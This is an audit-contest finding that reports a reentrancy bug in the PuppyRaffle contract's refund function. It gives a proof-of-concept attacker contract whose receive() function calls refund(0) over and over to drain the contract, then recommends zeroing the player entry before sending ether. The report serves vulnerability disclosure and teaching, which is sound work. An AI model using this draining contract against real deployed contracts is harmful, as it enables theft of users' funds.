Submission Details
Severity:
Reentrancy attack on Refund
Summary
Attacker can reenter the refund function since state is modified after the funds have been sent.
Vulnerability Details
Attacker can modify the receive/fallback functions and re-call the refund functions until it's fully drained.
Impact
Account will be drained
Tools Used
interface IPuppyRaffle {
function refund(uint256 playerIndex) external;
function enterRaffle(address[] memory newPlayers) external payable;
function getActivePlayerIndex(address player) external view returns (uint256);
function selectWinner() external;
function withdrawFees() external;
}
contract ReentrancyAttack {
IPuppyRaffle public raffle;
address[] private players;
constructor(address _raffle) {
raffle = IPuppyRaffle(_raffle);
}
receive() external payable {
if (address(raffle).balance > 0) {
raffle.refund(0);
}
}
function startGame() external payable {
players.push(address(this));
players.push(...);
raffle.enterRaffle{value: msg.value}(players);
delete players;
}
function attack() external payable {
raffle.refund(0);
}
}
Recommendations
Delete player from players list before sending the ether back
function refund(uint256 playerIndex) public {
...
players[playerIndex] = address(0);
payable(msg.sender).sendValue(entranceFee);
...
}
Updates
Lead Judging Commences
Hamiltonite about 2 years ago
Submission Judgement Published Assigned finding tags:
reentrancy-in-refund
reentrancy in refund() function
Rewards breakdown
nSLOC
143This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.